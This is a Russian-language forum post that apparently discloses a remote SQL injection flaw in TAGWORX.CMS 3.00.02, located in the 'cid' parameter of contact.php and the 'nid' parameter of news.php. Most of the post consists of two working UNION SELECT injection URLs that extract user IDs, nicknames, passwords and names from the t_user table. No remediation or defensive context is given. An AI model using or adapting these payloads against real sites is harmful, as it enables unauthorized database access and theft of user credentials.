27.05.2008, 18:03
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
С нами:
10019906
Репутация:
3702
|
|
TAGWORX.CMS Remote SQL Injection
Продукт: TAGWORX.CMS
Версия: 3.00.02
Производитель: http://www.tagworx.net/
Воздействие: Remote SQL Injection
Ошибка существует из-за недостаточной обработки данных в параметре "cid" в скрипте contact.php и в параметре "nid" в скрипте news.php
Пример:
Код:
http://site.ru/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--
http://site.ru/news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name)),5,6+from+t_user--
Последний раз редактировалось Solide Snake; 27.05.2008 в 18:06..
|
|
|